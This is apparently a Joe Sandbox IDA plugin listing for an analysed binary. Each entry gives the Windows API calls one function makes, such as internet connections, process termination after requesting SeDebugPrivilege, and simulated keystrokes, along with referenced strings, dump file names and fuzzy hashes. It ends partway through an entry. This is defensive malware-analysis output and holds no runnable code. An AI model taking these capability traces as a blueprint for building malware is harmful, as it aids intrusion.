                                                • Instruction Fuzzy Hash: B2519570A00609AFDB20CF64DC95BAA3FB5FF9A710F104518F9529B2E0DB70E990EB40
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0058C182
                                                • GetLastError.KERNEL32 ref: 0058C195
                                                • SetEvent.KERNEL32(?), ref: 0058C1A9
                                                  • Part of subcall function 0058C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058C272
                                                  • Part of subcall function 0058C253: GetLastError.KERNEL32 ref: 0058C322
                                                  • Part of subcall function 0058C253: SetEvent.KERNEL32(?), ref: 0058C336
                                                  • Part of subcall function 0058C253: InternetCloseHandle.WININET(00000000), ref: 0058C341
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                • String ID:
                                                • API String ID: 337547030-0
                                                • Opcode ID: cfdfb2378b12210eccc5a6195d0abf4f229cbddccc759d77990079f3f2e33ecd
                                                • Instruction ID: ef4ebc6702325274392a1a6c707f3af78ee6a66c85632095370511702284238e
                                                • Opcode Fuzzy Hash: cfdfb2378b12210eccc5a6195d0abf4f229cbddccc759d77990079f3f2e33ecd
                                                • Instruction Fuzzy Hash: 46318075200601AFDB21AFB5DC48A66BFF9FF69300B00441DF997A2650DB31E814EB70
                                                APIs
                                                  • Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
                                                  • Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
                                                  • Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 005725BD
                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005725DB
                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 005725DF
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 005725E9
                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00572601
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00572605
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0057260F
                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00572623
                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00572627
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                • String ID:
                                                • API String ID: 2014098862-0
                                                • Opcode ID: e960b58145b9f48b7a03b2e116e9c117e650d9a739f5235b9cb96ab3c7203277
                                                • Instruction ID: 6c4d37684ed6d9e3cd017629e0a6cd174e5f0399fcc14a979a4e7f699d898d2d
                                                • Opcode Fuzzy Hash: e960b58145b9f48b7a03b2e116e9c117e650d9a739f5235b9cb96ab3c7203277
                                                • Instruction Fuzzy Hash: 6E01D431390210BBFB1067699C8EF593F59EB9EB12F104001F318AF0D1C9E22449EA69
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00571449,?,?,00000000), ref: 0057180C
                                                • HeapAlloc.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 00571813
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00571449,?,?,00000000), ref: 00571828
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00571449,?,?,00000000), ref: 00571830
                                                • DuplicateHandle.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 00571833
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00571449,?,?,00000000), ref: 00571843
                                                • GetCurrentProcess.KERNEL32(00571449,00000000,?,00571449,?,?,00000000), ref: 0057184B
                                                • DuplicateHandle.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 0057184E
                                                • CreateThread.KERNEL32(00000000,00000000,00571874,00000000,00000000,00000000), ref: 00571868
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 09e8468a245220e03fdfcd945d78faa8b3f697f1e8659289c2849273603031c6
                                                • Instruction ID: 46fec11f13f0ccf2d9f6bbdd5053c8cba2646cac1bf36057acf69a3238f3dc8e
                                                • Opcode Fuzzy Hash: 09e8468a245220e03fdfcd945d78faa8b3f697f1e8659289c2849273603031c6
                                                • Instruction Fuzzy Hash: 5701BBB5340308BFE710ABA5DC4DF6B3FACEB9AB11F008411FA05DB1A1DA709804DB20
                                                APIs
                                                  • Part of subcall function 0057D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0057D501
                                                  • Part of subcall function 0057D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0057D50F
                                                  • Part of subcall function 0057D4DC: CloseHandle.KERNEL32(00000000), ref: 0057D5DC
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0059A16D
                                                • GetLastError.KERNEL32 ref: 0059A180
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0059A1B3
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0059A268
                                                • GetLastError.KERNEL32(00000000), ref: 0059A273
                                                • CloseHandle.KERNEL32(00000000), ref: 0059A2C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: ac8467f77acd6d20e48965530fabdb13270f78c6b943394862487d9f12b233cc
                                                • Instruction ID: e0704fa6ca13c87619b056634e1cb1450a27cccd01a9f3c3f23e821b2de89b9e
                                                • Opcode Fuzzy Hash: ac8467f77acd6d20e48965530fabdb13270f78c6b943394862487d9f12b233cc
                                                • Instruction Fuzzy Hash: 5D615E342042429FEB10DF18C498F55BFA1BF94318F14849CE4664B7A2C776ED45CBD2
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005A3925
                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 005A393A
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005A3954
                                                • _wcslen.LIBCMT ref: 005A3999
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 005A39C6
                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005A39F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcslen
                                                • String ID: SysListView32
                                                • API String ID: 2147712094-78025650
                                                • Opcode ID: f01334a2a6e1618b05379d73bd6a9e98ff72a4ae3d3d6b655d43d670c74be508
                                                • Instruction ID: a1f9f8aba6b8e4cb58b309b81d8268a2f0420fcd9578ca1bfad196a03ca267d3
                                                • Opcode Fuzzy Hash: f01334a2a6e1618b05379d73bd6a9e98ff72a4ae3d3d6b655d43d670c74be508
                                                • Instruction Fuzzy Hash: A641D071A00219ABEB21DF64CC49BEE7FA9FF49354F100526F948E7281D7B49E84CB90
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0057BCFD
                                                • IsMenu.USER32(00000000), ref: 0057BD1D
                                                • CreatePopupMenu.USER32 ref: 0057BD53
                                                • GetMenuItemCount.USER32(01585818), ref: 0057BDA4
                                                • InsertMenuItemW.USER32(01585818,?,00000001,00000030), ref: 0057BDCC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                • String ID: 0$2
                                                • API String ID: 93392585-3793063076
                                                • Opcode ID: 494da3f4b1aa77ae215433e21e77289b6ffb16378bea6289337b786cb5ad49f7
                                                • Instruction ID: 2c2c97a1fb7455183e1d6cc62613661665a13b37a265714c6c8adc8c2d7d318f
                                                • Opcode Fuzzy Hash: 494da3f4b1aa77ae215433e21e77289b6ffb16378bea6289337b786cb5ad49f7
                                                • Instruction Fuzzy Hash: 72519F70A002059FEB21CFA8E888BAEBFF4BF55314F14C519E419D7291E7719944EB51
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 00532D4B
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00532D53
                                                • _ValidateLocalCookies.LIBCMT ref: 00532DE1
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00532E0C
                                                • _ValidateLocalCookies.LIBCMT ref: 00532E61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: &HS$csm
                                                • API String ID: 1170836740-2847240634
                                                • Opcode ID: 60946cf2c6352f6042e4c9637a5862af839fd061c5a36f7a07a9601b591cae74
                                                • Instruction ID: 0bea1da9764ef4f34922b89c5fa33763107bcb5945878550b89b573c13aae0ce
                                                • Opcode Fuzzy Hash: 60946cf2c6352f6042e4c9637a5862af839fd061c5a36f7a07a9601b591cae74
                                                • Instruction Fuzzy Hash: C841A434A01609EBCF10DF68C849A9EBFB5BF84324F148555E915AB392D731EE06CBD0
                                                APIs
                                                • LoadIconW.USER32(00000000,00007F03), ref: 0057C913
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: ea2bc0b084ce332786ab556cd7c5520075d54c1e45639393e8a50dd1be2c80e2
                                                • Instruction ID: e212c30a210cf7aa27542c3ff9acd9c788ff0629e0f630f1785aae49e8fb743c
                                                • Opcode Fuzzy Hash: ea2bc0b084ce332786ab556cd7c5520075d54c1e45639393e8a50dd1be2c80e2
                                                • Instruction Fuzzy Hash: EE11EB3168930BBBA7119B54AC82CEA7F9CFF15754B10442FF608A6282D7707D417665
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$LocalTime
                                                • String ID:
                                                • API String ID: 952045576-0
                                                • Opcode ID: 91c284f149294394141a96bf077773e97512e10061c01fc198e0c790f3d07584
                                                • Instruction ID: fd9260e992b1fcecdb2533b2e0b1c8fb117d3ad969f22688c65896332eea0067
                                                • Opcode Fuzzy Hash: 91c284f149294394141a96bf077773e97512e10061c01fc198e0c790f3d07584
                                                • Instruction Fuzzy Hash: 80418466C1021975CB11EBB4988EACF7BBCBF89710F508466F518E3122FB34E255C7A5
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0052F953
                                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0056F3D1
                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0056F454
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 555f59884f08ed50073d300ce7ac90860e5ff693b2ecf81badc99e52699361ac
                                                • Instruction ID: 07321a2e70d98a1bac38aea76dd3c6b95a3245066138fbfcc962061d945a9381
                                                • Opcode Fuzzy Hash: 555f59884f08ed50073d300ce7ac90860e5ff693b2ecf81badc99e52699361ac
                                                • Instruction Fuzzy Hash: FB410B31608690BAC7398B2DF88872A7FB1BF97314F14483CE087576E1D631A8C4DB11
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 005A2D1B
                                                • GetDC.USER32(00000000), ref: 005A2D23
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005A2D2E
                                                • ReleaseDC.USER32(00000000,00000000), ref: 005A2D3A
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 005A2D76
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 005A2D87
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,005A5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 005A2DC2
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005A2DE1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: 826aeedad7eb1065195f62f79de3374bf1494445f255d6e05f40f3e10ce37e8e
                                                • Instruction ID: b6d39b8348042ce4923334a8c5d0a1ebf2a7551c46a4fdac2a551361e7c2b3a7
                                                • Opcode Fuzzy Hash: 826aeedad7eb1065195f62f79de3374bf1494445f255d6e05f40f3e10ce37e8e
                                                • Instruction Fuzzy Hash: 92316972201214BBEB218F548C8AFEB3FA9FB1A715F044055FE089A292C6759C55CBA4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: 70b45551231ea2c49f2181fb741abaf3fd90eb8826f5753e55158a43b827ec74
                                                • Instruction ID: ce476ce3a50280507b72a00b44a597f3a5bb3df3f37a3004d0808bb695d88dfd
                                                • Opcode Fuzzy Hash: 70b45551231ea2c49f2181fb741abaf3fd90eb8826f5753e55158a43b827ec74
                                                • Instruction Fuzzy Hash: 82212961644E0A77D2185521AD96FFE3F5CFF61394F448420FD0E9A581FBA0EE1092E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: NULL Pointer assignment$Not an Object type
                                                • API String ID: 0-572801152
                                                • Opcode ID: 5a56291e7cb7dc02fb1611ac729ea5b451d6355270a925ecd4a4f7b9ac67e684
                                                • Instruction ID: 4994603213440e1249d98e5c545af81e94d688fc66b64a5b5c8d9e703bc23fe2
                                                • Opcode Fuzzy Hash: 5a56291e7cb7dc02fb1611ac729ea5b451d6355270a925ecd4a4f7b9ac67e684
                                                • Instruction Fuzzy Hash: A9D1E271A0060AAFDF11CFA8C885FAEBBB5FF48344F148469E915AB281E770DD55CB90
                                                APIs
                                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,005517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 005515CE
                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00551651
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,005517FB,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005516E4
                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005516FB
                                                  • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00551777
                                                • __freea.LIBCMT ref: 005517A2
                                                • __freea.LIBCMT ref: 005517AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                • String ID:
                                                • API String ID: 2829977744-0
                                                • Opcode ID: e8304211e53872cf78084dfc1e33bd3c4004e3408b64d64a4d2f45e1bf780cc9
                                                • Instruction ID: c04c13829556676bdde93f596624673d63ad07e03a4ba3af2b3dd2827bf6d391
                                                • Opcode Fuzzy Hash: e8304211e53872cf78084dfc1e33bd3c4004e3408b64d64a4d2f45e1bf780cc9
                                                • Instruction Fuzzy Hash: 9D91C671E10A165ADB208E78C8A5BEE7FB5FF49315F18055AEC02E7141EB35DC48CB68
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2610073882-625585964
                                                • Opcode ID: 394316b21b43a62c5a4bf4c2d46862402d16557e59365ab99ad4b497214932e2
                                                • Instruction ID: 41213f7b4867b2642b7d579067c4a1d108a3a7272f84ede0c31922d5a4a1301b
                                                • Opcode Fuzzy Hash: 394316b21b43a62c5a4bf4c2d46862402d16557e59365ab99ad4b497214932e2
                                                • Instruction Fuzzy Hash: B5917E71A00219ABDF24CFA4D848FAEBFB8FF46715F108559E505AB280D7709D46CFA0
                                                APIs
                                                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0058125C
                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00581284
                                                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 005812A8
                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005812D8
                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0058135F
                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005813C4
                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00581430
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
